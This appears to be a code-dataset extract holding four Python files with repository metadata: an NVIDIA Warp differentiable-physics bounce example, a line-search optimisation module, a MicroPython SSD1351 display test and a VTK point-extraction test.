] | 306 | 2022-03-21T23:24:13.000Z | 2022-03-31T21:11:28.000Z | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
] | 11 | 2022-03-23T06:23:25.000Z | 2022-03-31T22:17:18.000Z | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
] | 18 | 2022-03-22T16:27:21.000Z | 2022-03-30T20:07:47.000Z | # Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
###########################################################################
# Example Sim Grad Bounce
#
# Shows how to use Warp to optimize the initial velocity of a particle
# such that it bounces off the wall and floor in order to hit a target.
#
# This example uses the built-in wp.Tape() object to compute gradients of
# the distance to target (loss) w.r.t the initial velocity, followed by
# a simple gradient-descent optimization step.
#
###########################################################################
import os
import numpy as np
import warp as wp
import warp.sim
import warp.sim.render
wp.init()

class Bounce:

    # seconds
    sim_duration = 0.6

    # control frequency
    frame_dt = 1.0/60.0
    frame_steps = int(sim_duration/frame_dt)

    # sim frequency
    sim_substeps = 8
    sim_steps = frame_steps * sim_substeps
    sim_dt = frame_dt / sim_substeps
    sim_time = 0.0
    render_time = 0.0

    train_iters = 250
    train_rate = 0.01

    def __init__(self, render=True, profile=False, adapter='cpu'):

        builder = wp.sim.ModelBuilder()
        builder.add_particle(pos=(-0.5, 1.0, 0.0), vel=(5.0, -5.0, 0.0), mass=1.0)
        builder.add_shape_box(body=-1, pos=(2.0, 1.0, 0.0), hx=0.25, hy=1.0, hz=1.0)

        self.device = adapter
        self.profile = profile

        self.model = builder.finalize(adapter)
        self.model.ground = True

        self.model.soft_contact_ke = 1.e+4
        self.model.soft_contact_kf = 0.0
        self.model.soft_contact_kd = 1.e+1
        self.model.soft_contact_mu = 0.25
        self.model.soft_contact_margin = 10.0

        self.integrator = wp.sim.SemiImplicitIntegrator()

        self.target = (-2.0, 1.5, 0.0)
        self.loss = wp.zeros(1, dtype=wp.float32, device=adapter, requires_grad=True)

        # allocate sim states for trajectory
        self.states = []
        for i in range(self.sim_steps+1):
            self.states.append(self.model.state(requires_grad=True))

        # one-shot contact creation (valid if we're doing simple collision against a constant normal plane)
        wp.sim.collide(self.model, self.states[0])

        # test the constructor argument rather than self.render, which is the
        # (always truthy) bound render() method
        if render:
            self.stage = wp.sim.render.SimRenderer(self.model, os.path.join(os.path.dirname(__file__), "outputs/example_sim_grad_bounce.usd"))
    @wp.kernel
    def loss_kernel(pos: wp.array(dtype=wp.vec3),
                    target: wp.vec3,
                    loss: wp.array(dtype=float)):

        # distance to target
        delta = pos[0]-target
        loss[0] = wp.dot(delta, delta)

    @wp.kernel
    def step_kernel(x: wp.array(dtype=wp.vec3),
                    grad: wp.array(dtype=wp.vec3),
                    alpha: float):

        tid = wp.tid()

        # gradient descent step
        x[tid] = x[tid] - grad[tid]*alpha
    def compute_loss(self):

        # run control loop
        for i in range(self.sim_steps):
            self.states[i].clear_forces()

            self.integrator.simulate(self.model,
                                     self.states[i],
                                     self.states[i+1],
                                     self.sim_dt)

        # compute loss on final state
        wp.launch(self.loss_kernel, dim=1, inputs=[self.states[-1].particle_q, self.target, self.loss], device=self.device)

        return self.loss

    def render(self, iter):

        # render every 16 iters
        if iter % 16 > 0:
            return

        # draw trajectory
        traj_verts = [self.states[0].particle_q.numpy()[0].tolist()]

        for i in range(0, self.sim_steps, self.sim_substeps):
            traj_verts.append(self.states[i].particle_q.numpy()[0].tolist())

            self.stage.begin_frame(self.render_time)
            self.stage.render(self.states[i])
            self.stage.render_box(pos=self.target, rot=wp.quat_identity(), extents=(0.1, 0.1, 0.1), name="target")
            self.stage.render_line_strip(vertices=traj_verts, color=wp.render.bourke_color_map(0.0, 7.0, self.loss.numpy()[0]), radius=0.02, name=f"traj_{iter}")
            self.stage.end_frame()

            self.render_time += self.frame_dt

        self.stage.save()
    def check_grad(self):

        param = self.states[0].particle_qd

        # initial value
        x_c = param.numpy().flatten()

        # compute numeric gradient
        x_grad_numeric = np.zeros_like(x_c)

        for i in range(len(x_c)):
            eps = 1.e-3
            step = np.zeros_like(x_c)
            step[i] = eps

            x_1 = x_c + step
            x_0 = x_c - step

            param.assign(x_1)
            l_1 = self.compute_loss().numpy()[0]

            param.assign(x_0)
            l_0 = self.compute_loss().numpy()[0]

            dldx = (l_1-l_0)/(eps*2.0)

            x_grad_numeric[i] = dldx

        # reset initial state
        param.assign(x_c)

        # compute analytic gradient
        tape = wp.Tape()
        with tape:
            l = self.compute_loss()

        tape.backward(l)

        x_grad_analytic = tape.gradients[param]

        print(f"numeric grad: {x_grad_numeric}")
        print(f"analytic grad: {x_grad_analytic}")

        tape.zero()
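
    # The numeric check above uses the central-difference approximation
    #   df/dx_i ≈ (f(x + eps*e_i) - f(x - eps*e_i)) / (2*eps),
    # whose truncation error is O(eps^2); it should closely match the
    # analytic gradient recorded by the tape.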
    def train(self):

        for i in range(self.train_iters):

            tape = wp.Tape()

            with wp.ScopedTimer("Forward", active=self.profile):
                with tape:
                    self.compute_loss()

            with wp.ScopedTimer("Backward", active=self.profile):
                tape.backward(self.loss)

            with wp.ScopedTimer("Render", active=self.profile):
                self.render(i)

            with wp.ScopedTimer("Step", active=self.profile):
                x = self.states[0].particle_qd
                x_grad = tape.gradients[self.states[0].particle_qd]

                print(f"Iter: {i} Loss: {self.loss}")
                print(f"  x: {x} g: {x_grad}")

                wp.launch(self.step_kernel, dim=len(x), inputs=[x, x_grad, self.train_rate], device=self.device)

            tape.zero()
    def train_graph(self):

        # capture forward/backward passes
        wp.capture_begin()

        tape = wp.Tape()
        with tape:
            self.compute_loss()

        tape.backward(self.loss)

        self.graph = wp.capture_end()

        # replay and optimize
        for i in range(self.train_iters):

            with wp.ScopedTimer("Step", active=self.profile):

                # forward + backward
                wp.capture_launch(self.graph)

                # gradient descent step
                x = self.states[0].particle_qd
                wp.launch(self.step_kernel, dim=len(x), inputs=[x, x.grad, self.train_rate], device=self.device)

                print(f"Iter: {i} Loss: {self.loss}")
                print(tape.gradients[self.states[0].particle_qd])

                # clear grads for next iteration
                tape.zero()

            with wp.ScopedTimer("Render", active=self.profile):
                self.render(i)
bounce = Bounce(adapter=wp.get_preferred_device(), profile=False, render=True)
bounce.check_grad()
bounce.train_graph()
| 28.912548 | 161 | 0.574303 | 1,011 | 7,604 | 4.195846 | 0.256182 | 0.035361 | 0.018152 | 0.015559 | 0.218293 | 0.137199 | 0.126827 | 0.07025 | 0.057049 | 0.057049 | 0 | 0.023117 | 0.294582 | 7,604 | 263 | 162 | 28.912548 | 0.767711 | 0.166491 | 0 | 0.2 | 0 | 0 | 0.036893 | 0.005688 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059259 | false | 0 | 0.037037 | 0 | 0.192593 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc51f065eb8ca85aa842d7f3d633a1dccfbb3b5 | 18,655 | py | Python | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | 6 | 2017-09-15T20:54:14.000Z | 2021-05-07T21:32:43.000Z | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | null | null | null | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | 5 | 2017-09-20T17:39:41.000Z | 2020-05-03T23:24:43.000Z | ###############################################################################
# The MIT License (MIT)
#
# Copyright (c) 2017 Justin Lovinger
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""Strategies for determining step size during an optimization iteration."""
import logging
import itertools
import numpy
from learning.optimize import IncrPrevStep, QuadraticInitialStep
#########################
# Base Model
#########################
class StepSizeGetter(object):
    """Returns step size when called.

    Used by Optimizer.
    """
    def reset(self):
        """Reset parameters."""
        pass

    def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
        """Return step size.

        xk: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        problem: Problem; Problem instance passed to Optimizer
        """
        raise NotImplementedError()
###############################
# StepSizeGetter implementations
###############################
class SetStepSize(StepSizeGetter):
    """Return a given step size every call.

    Simple and efficient. Not always effective.
    """
    def __init__(self, step_size):
        super(SetStepSize, self).__init__()

        self._step_size = step_size

    def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
        """Return step size.

        xk: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        problem: Problem; Problem instance passed to Optimizer
        """
        return self._step_size


class BacktrackingLineSearch(StepSizeGetter):
    """Return step size found with backtracking line search."""
    def __init__(self, c_1=0.5, decr_rate=0.5, initial_step_getter=None):
        super(BacktrackingLineSearch, self).__init__()

        self._c_1 = c_1
        self._decr_rate = decr_rate

        if initial_step_getter is None:
            # Slightly more than 1 step up
            initial_step_getter = IncrPrevStep(
                incr_rate=2.0 / self._decr_rate - 1.0,
                lower_bound=0.0,
                upper_bound=None)
        self._initial_step_getter = initial_step_getter

    def reset(self):
        """Reset parameters."""
        super(BacktrackingLineSearch, self).reset()
        self._initial_step_getter.reset()

    def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
        """Return step size.

        xk: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        problem: Problem; Problem instance passed to Optimizer
        """
        initial_step = self._initial_step_getter(xk, obj_xk, jac_xk, step_dir,
                                                 problem)

        step_size = _backtracking_line_search(
            xk,
            obj_xk,
            jac_xk,
            step_dir,
            problem.get_obj,
            self._c_1,
            initial_step,
            decr_rate=self._decr_rate)
        self._initial_step_getter.update(step_size)

        return step_size


class WolfeLineSearch(StepSizeGetter):
    """Specialized algorithm for finding step size that satisfies strong wolfe conditions."""
    def __init__(self, c_1=1e-4, c_2=0.9, initial_step_getter=None):
        super(WolfeLineSearch, self).__init__()

        # "In practice, c_1 is chosen to be quite small, say c_1 = 10^-4"
        # ~Numerical Optimization (2nd) pp. 33
        self._c_1 = c_1

        # "Typical values of c_2 are 0.9 when the search direction p_k
        # is chosen by a Newton or quasi-Newton method,
        # and 0.1 when pk is obtained from a nonlinear conjugate gradient method."
        # ~Numerical Optimization (2nd) pp. 34
        self._c_2 = c_2

        if initial_step_getter is None:
            initial_step_getter = QuadraticInitialStep()
        self._initial_step_getter = initial_step_getter

    def reset(self):
        """Reset parameters."""
        super(WolfeLineSearch, self).reset()
        self._initial_step_getter.reset()

    def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
        """Return step size.

        xk: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        problem: Problem; Problem instance passed to Optimizer
        """
        initial_step = self._initial_step_getter(xk, obj_xk, jac_xk, step_dir,
                                                 problem)

        step_size = _line_search_wolfe(xk, obj_xk, jac_xk, step_dir,
                                       problem.get_obj_jac, self._c_1,
                                       self._c_2, initial_step)
        self._initial_step_getter.update(step_size)

        return step_size
def _backtracking_line_search(parameters,
                              obj_xk,
                              jac_xk,
                              step_dir,
                              obj_func,
                              c_1,
                              initial_step,
                              decr_rate=0.9):
    """Return step size that satisfies the armijo rule.

    Discover step size by decreasing step size in small increments.

    args:
        parameters: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        obj_func: Function taking parameters and returning obj value at given parameters.
        c_1: Strictness parameter for Armijo rule.
    """
    if numpy.isnan(obj_xk):
        # Failsafe because _armijo_rule will never return True
        logging.warning(
            'nan objective value in _backtracking_line_search, defaulting to 1e-25 step size'
        )
        return 1e-25

    step_size = initial_step
    for i in itertools.count(start=1):
        if step_size < 1e-25:
            # Failsafe for numerical precision errors preventing _armijo_rule returning True
            # This can happen if gradient provides very little improvement
            # (or is in the wrong direction)
            logging.info(
                '_backtracking_line_search failed Armijo with step_size ~= 1e-25, returning'
            )
            return step_size

        obj_xk_plus_ap = obj_func(parameters + step_size * step_dir)

        if _armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap,
                        c_1):
            assert step_size > 0
            return step_size

        # Did not satisfy, decrease step size and try again
        step_size *= decr_rate
WOLFE_INCR_RATE = 1.5
def _line_search_wolfe(parameters, obj_xk, jac_xk, step_dir, obj_jac_func, c_1,
                       c_2, initial_step):
    """Return step size that satisfies wolfe conditions.

    See Numerical Optimization (2nd) pp. 60

    This procedure first finds an interval containing an
    acceptable step length (or just happens upon such a length),
    then calls the zoom procedure to fine tune that interval
    until an acceptable step length is discovered.

    args:
        parameters: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        obj_jac_func: Function taking parameters and returning obj and jac at given parameters.
        c_1: Strictness parameter for Armijo rule.
        c_2: Strictness parameter for curvature condition.
    """
    if numpy.isnan(obj_xk):
        # Failsafe for erroneously calculated obj_xk (usually overflow or x/0)
        # TODO: Might need similar failsafe for nan in jac_xk or step_dir
        logging.warning(
            'nan objective value in _line_search_wolfe, defaulting to 1e-10 step size'
        )
        return 1e-10

    step_zero_obj = obj_xk
    step_zero_grad = jac_xk.dot(step_dir)

    # We need the current and previous step size for some operations
    prev_step_size = 0.0
    prev_step_obj = step_zero_obj

    step_size = initial_step
    for i in itertools.count(start=1):
        if i >= 100:
            # Failsafe for numerical precision errors preventing convergence
            # This can happen if gradient provides very little improvement
            # (or is in the wrong direction)
            logging.info('Wolfe line search aborting after 100 iterations')
            return step_size

        # Evaluate objective and jacobian for most recent step size
        step_obj, step_grad = _step_size_obj_jac_func(step_size, parameters,
                                                      step_dir, obj_jac_func)

        # True if objective did not improve (step_obj >= prev_step_obj), after first iterations,
        # or armijo condition is False (step_obj > obj_xk + c_1*step_size*step_grad)
        if ((i > 1 and step_obj >= prev_step_obj)
                or (step_obj > obj_xk + c_1 * step_size * step_grad)):
            return _zoom_wolfe(prev_step_size, prev_step_obj, step_size,
                               parameters, obj_xk, step_zero_grad, step_dir,
                               obj_jac_func, c_1, c_2)

        # Check if step size is already an acceptable step length
        # True when gradient is sufficiently small (magnitude wise)
        elif numpy.abs(step_grad) <= -c_2 * step_zero_grad:
            return step_size

        # If objective value did not improve (first if statement)
        # and step size needs to increase (non-negative gradient)
        elif step_grad >= 0:
            return _zoom_wolfe(step_size, step_obj, prev_step_size, parameters,
                               obj_xk, step_zero_grad, step_dir, obj_jac_func,
                               c_1, c_2)

        # Increase step size, store current values for comparison to previous
        prev_step_size = step_size
        prev_step_obj = step_obj
        prev_step_grad = step_grad

        # Similar to zoom, we need to find a new trial step size
        # somewhere between current, and an arbitrary max
        # alpha_i < alpha_{i+1} < max

        # "The last step of the algorithm performs extrapolation to find
        # the next trial value alpha_{i+1}.
        # To implement this step we can use approaches like the interpolation
        # procedures above, or we can simply set alpha_{i+1} to some constant
        # multiple of alpha_i.
        # Whichever strategy we use,
        # it is important that the successive steps increase quickly enough to
        # reach the upper limit alpha_max in a finite number of iterations."
        # ~Numerical Optimization (2nd) pp. 61

        # Use multiply by constant strategy
        # TODO: Try other interpolation strategies
        step_size *= WOLFE_INCR_RATE
def _zoom_wolfe(step_size_low, step_size_low_obj, step_size_high, parameters,
                step_zero_obj, step_zero_grad, step_dir, obj_jac_func, c_1,
                c_2):
    """Zoom into acceptable step size within a given interval.

    Args:
        step_size_low: Step size with low objective value (good)
        step_size_high: Step size with high objective value (bad)
    """
    # NOTE: lower objective values are better
    # (hence step_size_low better than step_size_high)
    # TODO: Optimize by caching values repeatedly used in inequalities
    for i in itertools.count(start=1):
        # Choose step size
        # NOTE: step_size should not be too close to low or high
        # TODO: Test other strategies (see Interpolation subsection of NumOpt)
        # "Interpolate (using quadratic, cubic, or bisection)
        # to find a trial step length alpha_j between alpha_lo and alpha_hi"
        # ~Numerical Optimization (2nd) pp. 61

        # Use bisection
        step_size = _bisect_value(
            min(step_size_low, step_size_high),
            max(step_size_low, step_size_high))
        assert step_size >= 0

        if i >= 100:
            # Failsafe for numerical precision errors preventing convergence
            # This can happen if gradient provides very little improvement
            # (or is in the wrong direction)
            logging.info(
                'Wolfe line search (zoom) aborting after 100 iterations')
            return step_size

        step_obj, step_grad = _step_size_obj_jac_func(step_size, parameters,
                                                      step_dir, obj_jac_func)

        # If this step is worse than the projection from initial parameters
        # (a.k.a. the Armijo condition is False)
        # or this step is worse than the current low (good) step size
        if (step_obj > step_zero_obj + c_1 * step_size * step_zero_grad
                or step_obj >= step_size_low_obj):
            # step_size is not an improvement
            # This step size is the new poor valued side of the interval
            step_size_high = step_size

        # step_size is an improvement
        else:
            # If this step size caused an improvement
            # (first if statement is false),
            # and step size gradient is sufficiently small (magnitude wise)
            if numpy.abs(step_grad) <= -c_2 * step_zero_grad:
                return step_size

            # If good step size is larger than bad step size,
            # and gradient is positive,
            # or vice versa
            if step_grad * (step_size_high - step_size_low) >= 0:
                # Set the current bad step size to the current good step size
                # Because step_size is better (and will be set so in a couple lines)
                step_size_high = step_size_low

            # Set step_size_low
            step_size_low = step_size
            step_size_low_obj = step_obj
def _bisect_value(min_, max_):
    """Return value half way between min and max."""
    return min_ + 0.5 * (max_ - min_)


def _step_size_obj_jac_func(step_size, parameters, step_dir, obj_jac_func):
    """Return objective value and gradient for step size."""
    step_obj, jac_xk_plus_ap = obj_jac_func(parameters + step_size * step_dir)

    # Derivative of the step size objective function is jacobian
    # dot step direction
    step_grad = jac_xk_plus_ap.dot(step_dir)

    return step_obj, step_grad
def _wolfe_conditions(step_size, parameters, obj_xk, jac_xk, step_dir,
                      obj_xk_plus_ap, jac_xk_plus_ap, c_1, c_2):
    """Return True if Wolfe conditions (Armijo rule and curvature condition) are met.

    args:
        step_size: a; Proposed step size.
        parameters: x_k; Parameter values at current step.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        obj_xk_plus_ap: f(x_k + a_k p_k); Objective value at x_k + a_k p_k
        jac_xk_plus_ap: grad_f(x_k + a_k p_k); jacobian value at x_k + a_k p_k
        c_1: Strictness parameter for Armijo rule.
        c_2: Strictness parameter for curvature condition.
    """
    if not (0 < c_1 < c_2 < 1):
        raise ValueError('0 < c_1 < c_2 < 1')

    wolfe = (_armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap,
                          c_1)
             and _curvature_condition(jac_xk, step_dir, jac_xk_plus_ap, c_2))
    assert isinstance(
        wolfe,
        (numpy.bool_,
         bool)), '_wolfe_conditions should return bool, check parameters shape'
    return wolfe
def _armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap, c_1):
    """Return True if Armijo rule is met.

    Armijo rule:
    f(x_k + a_k p_k) <= f(x_k) + c_1 a_k p_k^T grad_f(x_k)

    Where all vectors are column matrices.

    args:
        step_size: a; Proposed step size.
        obj_xk: f(x_k); Objective value at x_k.
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        obj_xk_plus_ap: f(x_k + a_k p_k); Objective value at x_k + a_k p_k
        c_1: Strictness parameter for Armijo rule.
    """
    # NOTE: x.dot(y) == col_matrix(x).T * col_matrix(y)
    return obj_xk_plus_ap <= obj_xk + (c_1 * step_size) * (jac_xk.dot(step_dir))
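
# A tiny standalone check of the Armijo rule (illustrative, not part of the
# original module): minimizing f(x) = x**2 from x_k = 1 along the steepest
# descent direction p_k = -grad = -2, with c_1 = 1e-4. A full step overshoots
# and is rejected; half a step satisfies the rule.
if __name__ == '__main__':
    _xk = numpy.array([1.0])
    _jac = numpy.array([2.0])    # f'(1) = 2
    _pk = numpy.array([-2.0])    # steepest descent direction
    _f = lambda x: float(x[0]**2)
    print(_armijo_rule(1.0, _f(_xk), _jac, _pk, _f(_xk + 1.0 * _pk), 1e-4))  # False
    print(_armijo_rule(0.5, _f(_xk), _jac, _pk, _f(_xk + 0.5 * _pk), 1e-4))  # True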
def _curvature_condition(jac_xk, step_dir, jac_xk_plus_ap, c_2):
    """Return True if curvature condition is met.

    Curvature condition:
    grad_f(x_k + a_k p_k)^T p_k >= c_2 grad_f(x_k)^T p_k

    Where all vectors are column matrices.

    args:
        jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
        step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
        jac_xk_plus_ap: grad_f(x_k + a_k p_k); jacobian value at x_k + a_k p_k
        c_2: Strictness parameter for curvature condition.
    """
    # NOTE: x.dot(y) == col_matrix(x).T * col_matrix(y)
    return (jac_xk_plus_ap).dot(step_dir) >= c_2 * (jac_xk.dot(step_dir))
| 40.032189 | 96 | 0.633021 | 2,639 | 18,655 | 4.214096 | 0.15953 | 0.082007 | 0.01079 | 0.017265 | 0.510296 | 0.466595 | 0.399694 | 0.370201 | 0.357162 | 0.355274 | 0 | 0.010953 | 0.285446 | 18,655 | 465 | 97 | 40.11828 | 0.823331 | 0.498633 | 0 | 0.321429 | 0 | 0 | 0.047771 | 0.006046 | 0 | 0 | 0 | 0.004301 | 0.017857 | 1 | 0.107143 | false | 0.005952 | 0.02381 | 0 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc67afba8ed5dc9591c0f85d1fe2b5abb56dd2e | 546 | py | Python | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 198 | 2018-08-31T22:30:28.000Z | 2022-03-27T14:21:36.000Z | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 24 | 2018-10-01T23:44:25.000Z | 2022-01-08T09:05:14.000Z | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 44 | 2018-09-30T02:09:56.000Z | 2022-03-25T07:37:36.000Z | # test128_row.py Test for device driver on 128 row display
import machine
from ssd1351 import SSD1351 as SSD
# Initialise hardware
def setup():
    pdc = machine.Pin('X1', machine.Pin.OUT_PP, value=0)
    pcs = machine.Pin('X2', machine.Pin.OUT_PP, value=1)
    prst = machine.Pin('X3', machine.Pin.OUT_PP, value=1)
    spi = machine.SPI(1)
    ssd = SSD(spi, pcs, pdc, prst)  # Create a display instance
    return ssd

ssd = setup()
ssd.fill(0)
ssd.line(0, 0, 127, 127, ssd.rgb(0, 255, 0))
ssd.rect(0, 0, 15, 15, ssd.rgb(255, 0, 0))
ssd.show()
| 28.736842 | 63 | 0.664835 | 98 | 546 | 3.663265 | 0.459184 | 0.167131 | 0.108635 | 0.125348 | 0.172702 | 0.116992 | 0 | 0 | 0 | 0 | 0 | 0.100897 | 0.18315 | 546 | 18 | 64 | 30.333333 | 0.704036 | 0.184982 | 0 | 0 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bca10654ae55fb2d3ea1b8dd68b0e38ebec9051 | 2,202 | py | Python | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | 4 | 2019-05-30T01:52:12.000Z | 2021-09-29T21:12:13.000Z | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | null | null | null | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Interpolate onto a volume
# Parameters for debugging
NPts = 1000000
math = vtk.vtkMath()
math.RandomSeed(31415)
# create pipeline
#
points = vtk.vtkBoundedPointSource()
points.SetNumberOfPoints(NPts)
points.ProduceRandomScalarsOn()
points.ProduceCellOutputOff()
points.Update()
# Create a sphere implicit function
sphere = vtk.vtkSphere()
sphere.SetCenter(0.9,0.1,0.1)
sphere.SetRadius(0.33)
# Extract points within sphere
extract = vtk.vtkExtractPoints()
extract.SetInputConnection(points.GetOutputPort())
extract.SetImplicitFunction(sphere)
# Time execution
timer = vtk.vtkTimerLog()
timer.StartTimer()
extract.Update()
timer.StopTimer()
time = timer.GetElapsedTime()
print("Time to remove points: {0}".format(time))
print(" Number removed: {0}".format(extract.GetNumberOfPointsRemoved()))
print(" Original number of points: {0}".format(NPts))
# First output are the non-outliers
extMapper = vtk.vtkPointGaussianMapper()
extMapper.SetInputConnection(extract.GetOutputPort())
extMapper.EmissiveOff()
extMapper.SetScaleFactor(0.0)
extActor = vtk.vtkActor()
extActor.SetMapper(extMapper)
# Create an outline
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(points.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
# Create the RenderWindow, Renderer and both Actors
#
ren0 = vtk.vtkRenderer()
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren0)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren0.AddActor(extActor)
ren0.AddActor(outlineActor)
ren0.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(250,250)
cam = ren0.GetActiveCamera()
cam.SetFocalPoint(1,1,1)
cam.SetPosition(0,0,0)
ren0.ResetCamera()
ren1.SetActiveCamera(cam)
iren.Initialize()
# render the image
#
renWin.Render()
#iren.Start()
